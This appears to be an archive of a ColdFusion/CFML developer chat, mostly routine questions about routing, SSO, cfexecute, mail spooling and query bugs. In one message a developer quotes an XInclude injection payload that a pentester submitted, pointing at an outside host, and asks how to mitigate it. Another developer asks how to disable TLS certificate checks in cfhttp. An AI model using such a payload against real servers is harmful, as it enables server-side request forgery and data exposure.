this is an example of a route I am using in Routes.cfm //user view addRoute(pattern="/api/user/:user_id",handler="api.user", action={ post="doEdit" , get="view", options="returnOptions" });

This configuration should filter out and generate the YML file for the "api/user" endpoint only cbswagger = { // The route prefix to search. Routes beginning with this prefix will be determined to be api routes "routes" : [ "api/user" ],... but doesn't work for me. It actually throws an error on a previous endpoint called Appointment, like so: { "message": "The $ref file pointer of HTTP verb POST -> create/update Appointment could not be loaded and parsed as a valid object. If your $ref file content is an array, please nest the array within an object as a named key. - (error handler: main.onException)", "success": 0, "result": "", "statuscode": 500, "httpmethod": "GET", "httpcontent": "", "currentevent": "cbSwagger:Main.index" }

General SSO authentication question here. When a user initially visits your application you authenticate them with the identity provider. They may or may not already be logged in, but either way they authenticate. I'm guessing you don't want to try to authenticate them with every page request, so do you then set a session variable to say they're logged in? And if so, what happens when they intentionally log out of the central system? That should also log them out of your application, but if you're not checking each time, how would you know? The same holds for if their central log in expires. I feel like I'm trying to reinvent the wheel here and don't want to.

question about cfexecute: I have a command that works great when I run it on the command line, but when I try to run it via cfexecute, it does nothing. The command takes as arguments a source file and a destination file:

magick "c:/code/temp/sourcePic.png" "c:/code/temp/destPic.jpg"

and my cf code for it is:

cfexecute(
	name="#pathToIM#",
	timeout="60",
	arguments='"/temp/sourcePic.png" "/temp/destPic.jpg"',
	variable="result",
	errorVariable="error"
)

writedump({
	result: result,
	error: error
});

result

and

error

both end up as empty strings. Any ideas why it's neither erroring nor doing what it's supposed to?

Does anyone have a sense of resource consumption by CF 2021 vs (gasp) CF 9, memory and cpu? We're about to build out a new server, trying to ballpark how they should build it.

Thanks to some sponsored development the JSON Diff Library just got a brand new feature

diffByKey (origData, newData, uniqueKey [, ignored array of keys])

its great for diffing API and Database results (specifically arrays of structs), feel free to give it a try! https://forgebox.io/view/jsondiff

i need an advice, i have a structure data returned from api and i have a list of few names, i am trying to loop over a structure and see if one ofg structure key,name matches one in list, it should add another structure to it with the value of the item which was found, i am trying something like this an incomplete gist https://trycf.com/gist/5dcdbd480d582a318144288e89a078d6/lucee5?theme=monokai

Is there a way to clear all cached results of a single cfquery in

one request

?

which function can be used to match exact name instead of find or findnocase or findoneof?

i have a code in my code in Application.cfrc where due to existing changes are using a request .something, i want to move that code to application but due to that Request.something, i ave to move that to request instead of changing the request methods, i want to check that if those application based variables are already initialized, it should not run the request again, any clues

I am trying to debug a cfhttp issue on a dev environment, and the cfhttp is returning: "I/O Exception: Certificate for _--redacted--_.com doesn't match any of the subject alternative names: [*._--redacted--_ping.cloud]".... is there a way to disable the TLS cert checks/warnings in cfhttp for develpment purposes? a jvm setting maybe? The code has a cfoauth then after that a cfhttp runs to get user info from the sso api if the cfoauth is successfull. the first time through, the cfoath succeeds, but then the cfhttp fails with that error. then on subsequent requests the cfoauth failes until I restart CF serices. both the cfoauth and the cfhttp are pointing to the same domain. I am guessing there is a different server with a different certificate hosting the user info api requests, but once that one failes cf is somehow caching the bad certificate and causing the subsequent cfoauth requests to fail too.. or something equally confusing or mysterious to me. I have a ticket in with the owners of the sso system, however I was hoping I could bypass the checks for now to just keep working while they work out the certificate issue.

@bdw429s in your rabbitsdk code, you've got the following in a few methods:

var nullMe = ()=>{};

then later on you use it like so:

"result" : ( isNull( results ) ? nullMe() : results)

. is this just a cross-engine compatible way of achieving

nullValue()

? is it fundamentally equivalent to

javacast("null","")

?

More of a general security question - Is there a way to whitelist domains for samesite cookie restrictions? We'd like to keep

this.sessioncookie.sameSite = "secure";

but it breaks some of the session values we set between redirects in our Oauth2 flow.

Setup an existing CF website on IIS (previously on Apache) Application is working fine However there is some issue with the cookie management, Coldfusion (2016) is not able to read the cookie and its value passed with the Request Headers and it shows a separate set of cookies when dumped Any clue where the issue be (IIS setup or Coldfusion configuration)?

This message was deleted.

are exception objects read-only?

catch (any e) { if (!e.keyExists("message")) { e.message = "Hi there" }; }

This doesn't seem to work for me 😞

they're 'special' not-quite-structs, and yes are read only. you need to convert them to a regular struct to modify

ah, ok

I wanted to be lazy and throw with just types and then tack on a common message in the catch block. I'll just toss the message on in the throws themselves then 🙂 thanks!

Recently we had a pentester programmatically submit a form to one of our pages with this sort of value in one field:

<kwp xmlns:xi="<http://www.w3.org/2001/XInclude>"><xi=include href="<http://some-page-on-pentesters-sit.dtd>"/></kwp>

That had the effect or requesting that doc from the remote site. The page on our site didn't echo that value out, so it seems like it's the original POST that fetches that document from the remote site, and I don't see how I can do anything to prevent that. I also can't reproduce it by including a hidden field with that value pointing to a page on our own site, but their form had a bunch of other values in other fields too, including a checksum etc. Is anyone familiar with this sort of hack tech, or how I can mitigate it? Any user entered values that do get rendered on the page are htmlEditFormat() encoded, so they're not active HTML. What else should I be doing?

Hi all, I've run into a problem that hasn't reared its ugly head in a very long time... the ColdFusion mail spooler getting stuck. I remember having problems with this all the time back in the days of CF8, but this is a 2016 box running Standard. So, I'm sending out around 50,000 emails. This has worked without issue for years, but yesterday I changed mail server and now, after sending around 5,000 mails, the spooler service simply stops sending. No errors, no logs, etc. If I restart the ColdFusion service, the spooler begins to work again, but crucially, if I restart the spooler service itself via the service factory, it has no effect whatsoever. Obviously the mail server change must have had some effect, and I'd love to know what that is - but I'm stuck with it. No errors that side either. So, can anyone tell me: a) Why a reboot of ColdFusion works, but a restart of the

mailSpoolService

has no effect? b) Why the spooler is getting stuck in the first place and what bearing the mail server has on that? c) Any other workarouds? Thanks

Not sure what mail service you are using, but sometimes a mail service only accepts a maximum number of simultaneous connections from the same server. I guess (not sure) the open connections are freed on a cf restart. If possible I would certainly look at error log of your mail server. I can't remember exactly but we had similar problems years ago. We solved that by sending it to some local server first and we tweaked the max number of outgoing connections of the local relay.

Would the connection not be closed after each mail is sent though? The mail server is running Mimecast and the connection goes straight to that. I don't admin that service, but I've had a poke about in the admin panel and can't see anything untoward, no errors etc.

I can't remember exactly. I know we had to many connections open and I believe there were more emails sent on the same connection so it was not always immediately closing. But this was specific for our windows mail proxy. And several years ago

Has anyone seen a weird anomaly with Query of Queries that seems to have been introduced in ACF version 2018.0.12+328566. Version 2018.0.11+326016 doesn't exhibit this behavior. If you have an ORDER BY clause in your query and use a lower case name for the column to order by then the column is duplicated and added to the resulting query. I came across this with some code that did a CFDirectory then did a QoQ on the resulting query to select out records based on the name column and sort the resulting query by the name column. I noticed that the CFDirectory tag will return the query with lower cased column names. The QoQ will upper case the column names and if the ORDER BY clause references the

name

column in lower case the column is duplicated in the resulting query once with

NAME

as the column name and once with

name

as the column name.

learncfinaweek.com seems to be down again... @cfvonner can you ping the hosting? (I understood from searching here that you know who that is)

Anyone using a stacktrace prettifier they can vouch for?

what is the alternative to cfajaxproxy in jquery